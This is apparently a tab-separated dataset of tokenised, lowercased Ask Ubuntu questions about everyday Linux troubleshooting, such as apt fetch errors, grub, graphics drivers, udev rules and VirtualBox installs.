466184	size mismatch error while updating	i 've been getting the following error : e : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/d/dpkg/dpkg_1.17.5ubuntu5.2_amd64.deb size mismatch e : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/d/dpkg/libdpkg-perl_1.17.5ubuntu5.2_all.deb size mismatch due to this i 'm unable to update my other packages ! is there anyway to solve this problem or even bypass it so that other packages can be updated if not this one ... .please help ! output of /etc/apt/sources.list as requested : # deb cdrom : [ ubuntu-gnome 14.04 lts _trusty tahr_ - release amd64 ( 20140416.2 ) ] / trusty main multiverse restricted universe # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu trusty main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu trusty-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu trusty universe deb-src http : //archive.ubuntu.com/ubuntu trusty universe deb http : //archive.ubuntu.com/ubuntu trusty-updates universe deb-src http : //archive.ubuntu.com/ubuntu trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu trusty multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty multiverse deb http : //archive.ubuntu.com/ubuntu trusty-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-security main restricted deb http : //archive.ubuntu.com/ubuntu trusty-security universe deb-src http : //archive.ubuntu.com/ubuntu trusty-security universe deb http : //archive.ubuntu.com/ubuntu trusty-security multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu trusty partner # deb-src http : //archive.canonical.com/ubuntu trusty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main deb http : //archive.ubuntu.com/ubuntu trusty-proposed restricted universe main multiverse
466185	tails 1.0 frugal install : how to ?	i work on ubuntu 13.10 and i 'd like to `` frugal install '' tails 1.0 . is there anybody who knows how to edit 40_custom file to do it ? i found the following : menuentry `` tails '' { set isofile= '' /boot/iso/tails-i386-1.0.iso '' loopback loop ( hd0,7 ) $ isofile linux ( loop ) /live/vmlinuz boot=live config noswap nopersistent iso-scan/filename= $ isofile nomodeset initrd ( loop ) /live/initrd.img } after that , i update grub and restart my pc ; system found tails , but doens't start . any solution ?
466186	grub2 mutual dependency issue	for various reasons i am installing .deb dependencies for grub2 using dpkg directly ( rather than apt-get ) . root @ ubuntu : /dl # dpkg -i grub-gfxpayload-lists_0.6_amd64.deb selecting previously unselected package grub-gfxpayload-lists . ( reading database ... 249808 files and directories currently installed . ) preparing to unpack grub-gfxpayload-lists_0.6_amd64.deb ... unpacking grub-gfxpayload-lists ( 0.6 ) ... dpkg : dependency problems prevent configuration of grub-gfxpayload-lists : grub-gfxpayload-lists depends on grub-pc ( > = 1.99~20101210-1ubuntu2 ) ; however : package grub-pc is not configured yet . dpkg : error processing package grub-gfxpayload-lists ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : grub-gfxpayload-lists by configure i assume it means install+configure , so i tried : root @ ubuntu : /dl # dpkg -i grub-pc_2.02~beta2-9_amd64.deb ( reading database ... 249818 files and directories currently installed . ) preparing to unpack grub-pc_2.02~beta2-9_amd64.deb ... unpacking grub-pc ( 2.02~beta2-9 ) over ( 2.02~beta2-9 ) ... dpkg : dependency problems prevent configuration of grub-pc : grub-pc depends on grub2-common ( = 2.02~beta2-9 ) ; however : package grub2-common is not installed . grub-pc depends on grub-pc-bin ( = 2.02~beta2-9 ) ; however : package grub-pc-bin is not installed . grub-pc depends on grub-gfxpayload-lists ; however : package grub-gfxpayload-lists is not configured yet . dpkg : error processing package grub-pc ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : grub-pc how do i solve this problem ?
466187	error while upgrading ubuntu 12.04.4 lts to 14.04	i am getting error while upgrading ubuntu lts 12.04.4 to lts 14.04 getting error window of `` could not download the upgrades '' . and error in failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/ under this `` pool '' dir files are not fetching .
466189	will i be in trouble while mixing lubuntu and gnome ?	i 've had some troubles upgrading to ubuntu 14.04. so i decided to go for a fresh install instead . but unetbooting was not cooperating so did the `` startup disk creator '' . lucky for me ; there was an older lubuntu dvd hanging around on my desk and i upgraded from this distibution . after fiddling around however i swichted my desktop to gnome instead of the lxde environment . later on i discovered there is an ubuntu gnome distro available , so i began to wonder : will i be in ( future ) trouble if i stick to this mixed setup of lubuntu and gnome ? can i easily convert my system to ubuntu gnome just by removing the lxde packages ? what are the differences anyway ( besides the desktop envirinment ) ? thanks edit : i had a shopping list full of broken packages which prevented me to upgrade to 14.04 , that 's why i 'm asking this question.. ; o )
466197	clearsigned file is n't valid , from 01.org package ?	i 'm running ubuntu 14.04 lts , and i have an hd 4600 integrated graphics chip . lspci | grep vga 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) intel just released the new version of their graphics driver for ubuntu 14.04.https : //01.org/linuxgraphics/downloads/2014/intelr-graphics-installer-1.0.5-linux when i try to install it , i get stuck at : finished : e : gpg error : http : //download.01.org trusty inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) [ ] âś main-window.c/on_transaction_finished : package transaction finished with an error and it prevents sudo apt-get update from completing . i get the same error as before . i went to `` software & updates '' and under the `` other software '' tab , and removed the bad repository : http : //download.01.org/gfx/ubuntu/14.04/main , and then i could update my repositories . but i can not install the intel graphics driver ! i hope i 'm making sense . this is the first day this is available , so i 'm counting on intel to fix this soon , if not , i hope someone can help find a work around .
466198	how do i change the color for directories with ls in the console ?	on my console the color for directories is such a blue , that it is hard to read on a dark background . how can i change the color definitions for ls ? after trying something , i wonder how to just replace the definition in $ ls_colors ? mabe like this in .bashrc ? $ ls_colors= $ ls_colors'di=0 ; 35 : ' export $ ls_colors
466200	no video graphics ( cinnamon fallback mode )	after installing a .package file ( lacie network manager ) , i restarted my computer and the login screen does not appear anymore . i opened the terminal with ctrl + 2 and i could start mdm with sudo mdm . the problem is that cinnamon is working without proprietary drivers ( not software rendered ) and is launching in fallback mode . how can i fix this problem ? do i have to reconfigure xorg , intel drivers , .. ? thanks in advance . i have an asus zenbook prime ( ux31a ) with linux mint 16. lshw -c display *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : f7800000-f7bfffff memory : e0000000-efffffff ioport : f000 ( size=64 )
466202	update live usb distro ?	i have lubuntu 14.04 ( and ubuntu 14.04 ) on a pair of usb disks created by writing the img files to usb using dd on mac os x . unfortunately these systems both have some known bugs ( that have since been corrected ) and lack certain important drivers for my system ( which i have located online ) . how can i make the usb disks writable and how do i update the distribution upon them as one may do for a locally-installed system ? and if i later proceed to install from these usb sticks onto a hard-drive , will they ‘carry’ the package and driver updates with them or will i have to start from scratch again ? ( i seem to remember from my ancient windows xp days that such procedures were referred to as ’slipstreaming’ or somesuch on that side of the fence . ) ( no , i did not create a persistence partition when i created the sticks , because from mac clearly that isn’t an option . and anyway , as i imperfectly understand it , the persistence partition is for user files and not for the modification of the system . )
466206	argument-aware alias command ?	i want to create an alias for curl which automatically writes the file it curls into a file with the same name in the current directory . for example : % curl https : //bootstrap.pypa.io/get-pip.py curl https : //bootstrap.pypa.io/get-pip.py > get-pip.py is there a way to make the alias read the following argument and insert it into the actual executed script like this ?
466207	ubuntu 14.04 lts - no such file or directory	i 'm trying to install : eclipse ee kepler ( eclipse-jee-kepler-sr2-linux-gtk-x86_64 ) oracle express edition ( oracle-xe-11.2.0-1.0.x86_64.rpm ) whenever i try to access/install oracle setup using rpm ( i 've installed rpm ) i encounter error , i.e . no such file or directory exists . and in case of eclipse , if i try to extract eclipse file using tar command , still i get the same error of no such file or directory exists .
466209	what are the alternatives of lusca in 14.04 ?	is there any alternative to lusca in ubuntu 14.04 ? iâm unable to install it . i receive this error message : e : unable to locate package lusca what are the alternatives for that package , as i have come to know that lusca is not available for ubuntu 14.04 ?
466215	pulseaudio channel map at run time	could i map ( swap ) the channel at run time . i am using the ffmpeg to record the both video and audio from two logitech cam/mic and bluetooth mic . now currently at the starting of recording bluetooth is off the audio of both the logitech are coming from the left_channel as well as right_channel.and if bluetooth is on then only the bluetooth audio coming from left_channel and both logitech audio coming from right_channel . and again off the bluetooth the left_channel gets blank the both logitech audio coming from only right_channel . so if bluetooth is turned off then i wanted to replace the logitech audio to both the left_channel and right_channel . also if the bluetooth is on then i set it as default , i have used the following command to set it default : pacmd set-default-source bluez_source.00_1d_df_44_db_a6 > /dev/null also if bluetooth is off then i set the one logitech as default . i used the following command to set it default : pacmd set-default-source alsa_input.usb-046d_0823_d81a0330-00-u0x46d0x823_1.analog-stereo > /dev/null i am using the following ffmpeg command to record the audio and video . this command is generated if at the starting the bletooth is off : ffmpeg -loglevel warning -y -f v4l2 -s 544x288 -i /dev/video0 -vstats -vstats_file '/home/left_cam-stats ' -f pulse -name 'unknown source 0 ' -i alsa_input.pci-0000_00_1b.0.analog-stereo -filter lowpass -f pulse -name 'left_mic 0 ' -i alsa_input.usb-046d_0823_d81a0330-00-u0x46d0x823_1.analog-stereo -f pulse -name 'right_mic 1 ' -i alsa_input.usb-046d_0823_4b709030-00-u0x46d0x823.analog-stereo -f pulse -name 'default 0 ' -i default -f mpegts -crf 20 -r 24 -pix_fmt yuv420p -vcodec libx264 -vprofile baseline -t 02:00:00 -map 0:0 -map 1:0 -map 2:0 -map 3:0 -map 4:0 /home/left_cam.mp4 if bluetooth is on at starting the following ffmpeg command is generated . : ffmpeg -loglevel warning -y -f v4l2 -s 544x288 -i /dev/video0 -vstats -vstats_file '/home/left_cam-stats ' -f pulse -name 'unknown source 0 ' -i alsa_input.pci-0000_00_1b.0.analog-stereo -filter lowpass -f pulse -name 'left_mic 0 ' -i alsa_input.usb-046d_0823_d81a0330-00-u0x46d0x823_1.analog-stereo -f pulse -name 'right_mic 1 ' -i alsa_input.usb-046d_0823_4b709030-00-u0x46d0x823.analog-stereo -f pulse -name 'default 0 ' -i bluez_source.00_1d_df_44_db_a6 -f mpegts -crf 20 -r 24 -pix_fmt yuv420p -vcodec libx264 -vprofile baseline -t 02:00:00 -map 0:0 -map 1:0 -map 2:0 -map 3:0 -map 4:0 /home/left_cam.mp4 i want to replace the logitech audio to both left_channel and right_channel if bluetooth is off and if bluetooth is on then only the bluetooth audio from left_channel and both logitech from the right_channel .
466219	find and delete all files without extensions witin a folder and its subfolders	i have a folder without around 500 subdirectories . there is a lot of trash to be found in it and i want to clean it up . i have already deleted certain filetypes that i do n't want , like images , with this command : find . -mindepth 1 -iname `` *.jpg '' -type f -delete however , i now want to delete all extension-less files . files like `` shopping list '' intead of `` shopping list.txt '' i have tried the following command but it did not work : find . -mindepth 1 ! -iname `` * . * '' -type f -delete
466221	applications worked on windows xp but not ubuntu	please help me out . i have replaced xp with ubuntu 14.04 and the free stand alone applications that used to work on xp will not install on ubuntu . what can i do to get the applications installed and working . the error received says something to the likes of unable to archive ... ... ... . thanks
466227	boost and ixcoin and ppas ... messy problem	gpg error : download.opensuse.org release : the following signatures could n't be verified because the public key is not available : no_pubkey 29d8c8dac4447cf3 w : failed to fetch ppa.launchpad.net/alex-mieland/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found w : failed to fetch //ppa.launchpad.net/boost-latest/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found w : failed to fetch /ppa.launchpad.net/doctormo/xorg-wizardpen/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . attempting to install ixcoin . dang , this is making me feel stupid .
466228	installation type dialog : no options offered . how to get the options ?	i have been struggling over the last week to install ubuntu 14.04 as a dual boot option on my laptop currently running windows 7 . as it has no cd/dvd drive , i created a bootable usb stick . using the win disk management utility , i deleted one of the 4 partitions , and reduced the size of the main windows partition so that there is now about 50 gb unallocated space on the disk . but when i run the ubuntu installation , the dialog entitled `` installation type '' the box that is supposed to show the partitions on the hard disk is empty , there are no any selectable options , only 3 buttons : quit , back and install now . at this point i select quit , because i do n't want to risk overwriting my windows partition . what would happen if i select `` install now '' ? how can i install ubuntu alongside windows ?
466230	chromium does not start ( launch seems to start but not opening the application )	ubuntu 14.04 fully updated every day chromium does not start since some more days . no idea why . i uninstalled and made new installation from synaptic just now . no error message at installation . still no application window after launch . i can watch the 'launch icon ' ( turning telephone dial ) being activate for some more seconds untill it disappears , followed by ... nothing . not even an error message . the program worked already before without problem on the same pc . secondary less important problem is that dragging the icon fom the `` search '' window to the unity launchbar ( left ) does not work ; unless maybe i need more as simple mouse dragging action ? the icon ( copy ) follows my mouse pointer , but when left mouse button is released , the icon is not dropped into the launch bar . maybe this indicates that some installation module is not performed ? a normal installation would normally add the application icon into the launch bar ? is n't that a mandatatory requirement for unity ? thank you for advice . update 29 july 2014 i have been silent for some time . sorry but i was thinking to give up on ubuntu or linux all together . because this issue occurs for both user accounts on the same pc2 , using the same installed version ubuntu 14.04 lts , the suspicion on a bad profile folder would make no sense , ( unless both profiles were bad at same time , and not working as expected for chromium only ) . i was hoping that this problem would disappear just the same way as it appeared for no reason or explanation whatsoever . in the mean time several system updates were made but that would n't clear the problem . i now re-installed chromium again . no errors were reported . chromium is installed ( verified with synaptic and with 'files ' under section 'installed ' ) . still the situation persists . i do n't know how to start chromium on my pc2 , while on pc1 ( running the same ubuntu version ) chromium is running even smoother than firefox . on pc2 there is no lauch icon on the desktop . is there any practical method to start an installed program ? i will report my conclusions for another attempt , using terminal ( as already suggested before ) anyway i would appreciate some help . facing that much problems encountered so far with linux , it might not be such a bad idea at all coming to windows purchasing a new pc . thank you
466231	how to run package manager as i am not able to run it and an error is shown	can i get any stepwise solution for this error i am new to ubuntu and i have no idea to solve this issue this started when i installed openshot through command terminals displayed in this page http : //www.cyberciti.biz/faq/howto-install-openshot-under-debian-ubuntu-linux/ i have followed all the steps and after the installation i got this error currently i am using ubuntu 14.04lts 64-bit version
466233	revkit installation	so i need to install this software called revkit on ubuntu 12.10. below are the instructions as per the manual : requirements revkit needs a couple of packages which can easily be installed with the distribution’s package manager . below the commands for common distributions are listed . in distri- butions not listed it can be done analogue but the package names might deviate . ubuntu , mint linux ( for the python interface ubuntu 9.10 or higher is required ) : sudo apt−get install build−essential cmake python−dev ipython python−qt4 python−numpy opensuse : sudo zypper install gcc−c++ cmake python−devel ipython python−qt4 python−numpy fedora : sudo yum install wget gcc−c++ cmake python−devel ipython pyqt4 numpy 1 2 for a description of how to extend revkit with own approaches or how to integrate revkit in own c++-projects , respectively , we refer the reader to the developers’ documentation . the developers’ documentation ( including an api ) is provided by means of doxygen in the sources of revkit as well as on http : //www.revkit.org.revkit – user manual for fedora users : in order to run revkit , se linux needs to be disabled . this can be done temporarily or permanently as follows : temporarily : sudo /usr/sbin/setenforce 0 permanently : change ”enforcing” to ”disabled” in ”/etc/selinux/config” and reboot . 3 . download and installation revkit can be downloaded from the www.revkit.org website . opening a bash shell and assuming that the file revkit-1.3.tar.gz is in the current working directory , first the pack- age needs to be unpacked : tar xvfz revkit−1.3.tar . gz cd revkit−1.3 then , you can build the toolkit . the build process is divided into two scripts . first , the revkit environment is created using the bootstrap script . afterwards , the revkit algorithms are built using the build script . this has the benefit of running the second script only if changes have been made on the algorithms but not on the environment . the bootstrap script should only be called once at the beginning . more precisely , first run the bootstrap script : ./make.py bootstrap this will download and compile all dependencies automatically . for that purpose , compiling boost takes some time . if you already have installed boost using the distri- bution’s package manager , the option -dboost path can be used to specify its path , e.g . -dboost path=/usr . alternatively you can specify the boost include and libs path separately by using –boost , –boost-include-dir and –boost-lib-dir as arguments . plaese make sure that your version of boost satisfies the requirements . after bootstraping the environment , the build script needs to be executed . to run this script manually call : ./make.py build this will build the whole revkit suite including the core , algorithms , examples , and the python bindings . the python bindings enable the cli to use revkit like a shell . if the system can not build the python bindings or if they are not needed , they can be deactivated by calling ./make.py build −dbuild bindings=off 3 further packages which are not available in the distrubition’s package manager ( as e.g . cudd or puma ) are downloaded and installed automatically from the bootstrap script . boost is also required and will be downloaded and installed by default.revkit – user manual instead . the build script must be called at least once . afterwards , the sources only need to be compiled again if local changes have been performed . alternatively , the program make can be executed manually by calling make in the build directory . the build script also provides the options of enabling and disabling the compilation of unstable and example algorithms by using the parameters -dbuild unstable and -dbuild examples . 4.revkit – user manual after the installation , revkit is fully functional and ready to use . in this section , we describe how to apply the most important functions using “out of the box”-tools . this should provide a starting point to become familiar with the framework and its func- tionalities . 4.1 . revkit graphical user interface the revkit graphical user interface enables the creation and execution of customized design processes to be executed . therefore , a gui is utilized where the respective tasks can easily be put together by means of item blocks connected to a graph . each item performs an operation and may have ports for the respective input parameters and output results . input ports can be connected to output ports forming a channel when they support the same data types . in order to start the revkit graphical user interface , the following command has to be invoked from within the root directory of revkit : ./tools/gui/gui.py the use of the gui is illustrated by means of several tutorial-videos at the www.revkit.org website . i tried to do it many times but was n't successful . here 's a copy my last attempt . http : //paste.ubuntu.com/7466799/ can someone please tell me the errors that are occuring and how to rectify them . i need to get the gui interface of revkit somehow . if not can u describe the process in detail . i 'll be really really grateful .
466237	what should i use to backup my home partition to optical media ?	i have been looking around for a backup utility to handle breaking up my home folder backup across a set of blu-ray discs . aside from using brasero to manually add each file and folder i want include , is there a better way to do this ?
466238	how to add bookmark that connects to local server ?	usually i start my terminal and login to some server with the following line : ssh -x myuser @ myserver.de now i would like to add a bookmark so that i can login while brousing through the folders with my mouse . when i add network bookmark i can only edit the location , the following does not work network : ///myuser @ myserver.de i remember that i was able to add such a bookmark on a different computer . there i could add something like the username , host , port etc . i use ubuntu 12.04 . please let me know how to add the bookmark .
466242	how to install windows 7 in ubuntu 14.04 lts via virtual box	i have tried to install windows 7 via virtual box but it can not be done when i try to open it it shows this error i would like to install windows 7 via a cd so can anyone help me to get it installed
466243	deleting specific files in command line	i have files filename_1 , filename_2 ... filename_100000 where the filenames are numbered sequentially . how can i delete the files of index greater than , say 100 ?
466244	set up an android development environment [ eclipse and android studio ]	how can i setup an android development environment ?
466251	how do i connect a mysql client ?	i 'm trying to run mysql in ubuntu by running mysql -u root -p in the terminal and getting this error : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 )
466255	webcam is dark after boot and suddenly darkens after adjasment	i have lenovo ideapad z580a with embedded webcam . it worked fine . after installing ubuntu 14.04 my webcam is unstable . after a boot the camera image is too dark . v4l2ucp says : unable to get menu item for exposure , auto , index=0 will use unknown unable to get menu item for exposure , auto , index=2 will use unknown setting `` exposure , auto priority '' helps . but after some random time the image suddenly darkens . some time the image darkens after a minute . luvcview sets auto exposure but after that the image also suddenly darkens . uvcdynctrl -l webcam_settings.gpfl ( how to make webcam settings permanent ? ) can adjust webcam only if some software use it . but the image darkens after some time . how to set auto exposure ?
466257	postfix installed , by mail ( ) in php not working	i have a new server . just installed postfix ( apt-get install mailutils ) , and configured postfix as `` internet site '' . works fine when i 'm logged in as regular user on the command prompt and use mail xx @ domain.com to send a mail . when i try sending mail via php , nothing happens . i tried mail ( xx @ domain.com , subject , my test ) ; , but nothing is sent . when i look at /var/log/mail.log , nothing appears ( though everything appears when sending from command line , without php ) . when i did n't change my php.ini line ; sendmail_path = , nothing appears in the mail.log file . when , to test , i added sendmail_path = /usr/sbin/sendmail -i -t i get an error in my /var/log/mail.log , saying fatal : recipient addresses must be specified on the command line or via the -t option ( which seemed to be specified , according to me ... ? ) any idea what could be causing this ? how can i get my php to send mail ?
466258	can not log in ( entering correct password )	i 'm having problems with logging in . entering the correct password brings me back to the login screen . when i login to a tty , i ca n't use sudo . i get an error like this : sudo : effective uid is not 0 is sudo installed setuid root ?
466259	ubuntu 14.04 and xmanager	i installed ubuntu 14.04 and when trying to connect by xmanager 4 i got an error message ( gnome-session:8503 ) : critical : we failed , but the fail whale is dead . sorry ... . how to solve this issue ?
466260	error while installing windows 7 through virtual box	i have installed the extention packs of virtualbox a few monent ago and and again i click the button to install it it shows an other error related to bios currently i am using an integrated motherboard of gigabyte company is there any solution for this issue i have vt-x amd amd-v enabled
466269	how to purge and reinstall bumblebee completely ?	i have had bumblebee working since 13.04 . it took me some messing around though and now on 14.04 it is not working anymore . how can i purge it completely and reinstall it ?
466272	my touchpad wo n't work on ubuntu 14.04	my touchpad wo n't totally work after i clean installed ubuntu on my toshiba p855 . the driver is installed and up to date . i do n't know what do . please help ! !
466273	how to switch from bumblebee to nvidia-prime ?	i have been using bumblebee in the past . now i have read about nvidia-prime . how can i install nvidia-prime ? how do you configure it ? will it be in conflict with my current bumblebee install ? as a subquestion : what commands can i use to check what gpu is used and at what rates ? also see my other question on how to reinstall bumblebee .
466274	how can i get the source code for ubuntu 2.6.38.8 kernel ?	i need the source code for kernel 2.6.38.8 ( for research reasons ) . i have the vanilla linux source from kernel.org , but i would like the ubuntu release . thanks !
466275	can 3rd-party package repositories be trusted ? ( are there criteria to test if they 're trustworthy ? )	( note : no disrespect whatever to the hard work people that people who run 3rd-party repositories put in . ) i came across a package repository , a ppa , that was suggested for getting php5.5 on ubuntu 12.04 . this has to be added to the list of repositories that ubuntu knows to download software . in general , can such 3rd-party repositories be trusted ? in this particular case , the ppa seems to be well regarded - and i would certainly want to support this and recommend it . is there a checklist or criteria one can follow to arrive at a decision to trust a 3rd-party repository ? the aim here is to avoid downloading malware or anything else that may damage the computer .
466278	ubuntu 14.04 wont boot .	i installed ubuntu 14.04 from usb-drive and everything works fine . then i changed the 50-synaptics.config file . after trying to reboot ubuntu shows me the logo and then freezes with a underscore on the left top . any solutions ? really want to use linux . thank you .
466280	how to remove shortcut to open device panel in qtcreator in lubuntu 13.10 ?	i have just upgraded to lubuntu 13.10 and when i use shortcut lshift + rshift to change keyboard layout in qtcreator it switches to the ubuntu device panel . but in keyboard shortcut settings there is no shortcut for mode.ubuntudevices . how can i disable the panel switch when this shortut is used ?
466281	ubuntu 14.04 lts needs lot of performance improvement	ubuntu 14.04 lts needs lot of performance improvement . though you guys are giving lot of explanations on the performance / speed perspective ... .. the speed does not improve . can anyone help me in this regard . i have installed the 14.04 lts and have ati radeon graphics card . but the system opens any application / tool slowly . in short the performance has diminished about 15 % when we compare with 12.04 . can anyone support me in improving the speed of 14.04 lts ? .
466282	ca n't extend partition on xubuntu	i have xubuntu remix and xubuntu dual booted . how do i remove xubuntu and fix boot ? can i also extend xubuntu remix to take whole disc ? screenshot of gparted
466285	how to stream my laptop screen to the tv ?	recently i bought a samsung smart tv and with my android mobile phone ( using an app called wifi display ) i can stream what i see on the mobile to the tv . is this feature available on ubuntu ? i would like to share my screen to the tv without wires , like i do with the android . thanks !
466288	udev is creating wrong disk id symlinks	i have lots of hdd 's on my system , all but one are on usb . here 's my output from ls -la /dev/disk/by-id/ : ata-intel_ssdsc2cw060a3_cvcv2041010y060agn - > ../../sdc ata-intel_ssdsc2cw060a3_cvcv2041010y060agn-part1 - > ../../sdc1 ata-intel_ssdsc2cw060a3_cvcv2041010y060agn-part9 - > ../../sdc9 ata-m4-ct032m4ssd3_0000000013180377c645 - > ../../sda ata-m4-ct032m4ssd3_0000000013180377c645-part1 - > ../../sda1 ata-m4-ct032m4ssd3_0000000013180377c645-part2 - > ../../sda2 ata-m4-ct032m4ssd3_0000000013180377c645-part3 - > ../../sda3 ata-m4-ct032m4ssd3_0000000013180377c645-part4 - > ../../sda4 ata-st1000lm010-9yh146_z2m0110m - > ../../sdb ata-st1000lm010-9yh146_z2m0110m-part1 - > ../../sdb1 ata-wdc_wd30ezrx-00mmmb0_wd-wmawz0282248 - > ../../sdg ata-wdc_wd30ezrx-00mmmb0_wd-wmawz0282248-part9 - > ../../sdf9 usb-wdc_wd30_ezrx-00d8pb0_000000000000-0:0 - > ../../sdd usb-wdc_wd30_ezrx-00d8pb0_000000000000-0:0-part1 - > ../../sdd1 usb-wdc_wd30_ezrx-00d8pb0_000000000000-0:0-part9 - > ../../sdd9 usb-wdc_wd30_ezrx-00d8pb0_000000000000-0:1 - > ../../sde usb-wdc_wd30_ezrx-00d8pb0_000000000000-0:1-part1 - > ../../sde1 usb-wdc_wd30_ezrx-00d8pb0_000000000000-0:1-part9 - > ../../sde9 as you can see , most of the drives look to be correct , but the part9 of ata-wdc_wd30ezrx-00mmmb0_wd-wmawz0282248 is pointing to a different drive ( sdg for parent , sdf9 for part9 ) . why does this happen ? this is screwing up my zfs . ubuntu server 13.10 . i did n't edit udev rules aside from preventing the wwn-* symlinks from appearing .
466290	multiple udev rules in single file	i have a java program that works with peripheral devices via usb serial connection . i decided to use udev rules to avoid port swapping when reloading the operating system . i do a following test : plug coin acceptor ( peripheral devices ) in usb port run ls -l /dev/ | grep 'coin\|modem' plug modem ( peripheral devices ) in usb port run ls -l /dev/ | grep 'coin\|modem' my .rules file looks like this : subsystem== '' tty '' , attrs { idvendor } == '' 1d6b '' , attrs { idproduct } == '' 0001 '' , group= '' dialout '' , symlink= '' modem '' subsystem== '' tty '' , attrs { idvendor } == '' 10c4 '' , attrs { idproduct } == '' ea60 '' , group= '' dialout '' , symlink= '' coin '' the results are : lrwxrwxrwx 1 root root 7 may 15 13:56 coin - > ttyusb0 ... lrwxrwxrwx 1 root root 7 may 15 13:58 coin - > ttyusb1 changed .rules file and the results are : subsystem== '' tty '' , attrs { idvendor } == '' 1d6b '' , attrs { idproduct } == '' 0001 '' , group= '' dialout '' , symlink+= '' modem '' subsystem== '' tty '' , attrs { idvendor } == '' 10c4 '' , attrs { idproduct } == '' ea60 '' , group= '' dialout '' , symlink+= '' coin '' lrwxrwxrwx 1 root root 7 may 15 14:00 coin - > ttyusb0 # plug coin lrwxrwxrwx 1 root root 7 may 15 14:00 modem - > ttyusb0 ... lrwxrwxrwx 1 root root 7 may 15 14:00 coin - > ttyusb1 # plug modem lrwxrwxrwx 1 root root 7 may 15 14:00 modem - > ttyusb1 changed .rules file again and the results are : subsystem== '' tty '' , attrs { idvendor } == '' 1d6b '' , attrs { idproduct } == '' 0001 '' , group= '' dialout '' , symlink : = '' modem '' subsystem== '' tty '' , attrs { idvendor } == '' 10c4 '' , attrs { idproduct } == '' ea60 '' , group= '' dialout '' , symlink : = '' coin '' lrwxrwxrwx 1 root root 7 may 15 14:03 modem - > ttyusb0 ... lrwxrwxrwx 1 root root 7 may 15 14:03 modem - > ttyusb1 the expected result would be assign different symlinks for these devices .
466291	java 6 and 7 on one system	i am wondering if it is okay to have both java 6 and 7 installed at the same time on one system . will it not make things unstable ? would really need this because i need to test my programs in both java 6 and 7 .
466292	virt-manager ca n't connect to xen	when i try to connect to my xen domain with virtmanager on ubuntu 14.04 i just get the following error : unable to connect to libvirt . internal error : libxenlight state driver is not active verify that : - a xen host kernel was booted - the xen service has been started libvirt uri is : xen : /// traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1027 , in _open_thread self.vmm = self._try_open ( ) file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1009 , in _try_open flags ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 105 , in openauth if ret is none : raise libvirterror ( 'virconnectopenauth ( ) failed ' ) libvirterror : internal error : libxenlight state driver is not active
466294	python-uno , no module named uno	i am using ubuntu 14.04 with python 2.7.6 . i am trying to install python-uno library which allows use of the standard libreoffice api with the python scripting language , but i am unable to find the uno library for python 2.7 earlier when i was using ubuntu 12.04 , python-uno library was available . any help is appreciated .
466295	how to install a ubuntu 14.04 system on a 128 gb usb	i have been able to do this with an 8gb usb but when trying to do the same on a 128gb usb get various error codes talking about partitions and mount problems . can anyone give me clear instructions how to prepare the usb first as it looks as if it needs a boot partition . please go easy on the syntax - i am a beginner but can copy and paste ! ! !
466298	change channel of pulseaudio default device	i am using pulseaudio . i have set the bluetooth as default device , it set perfectly but i wanted to change the channel of that default device . can i change the channel of default device to right only or left only ? and how ?
466299	trouble with running the network animator	i have installed ns2 on ubuntu 14.04 and also installed the network animator1.15 latest version but whenever i try to run it , it gives me this error segmentation fault ( core dumped ) please someone help me how to resolve this problem as i am running out of time . i will be grateful ?
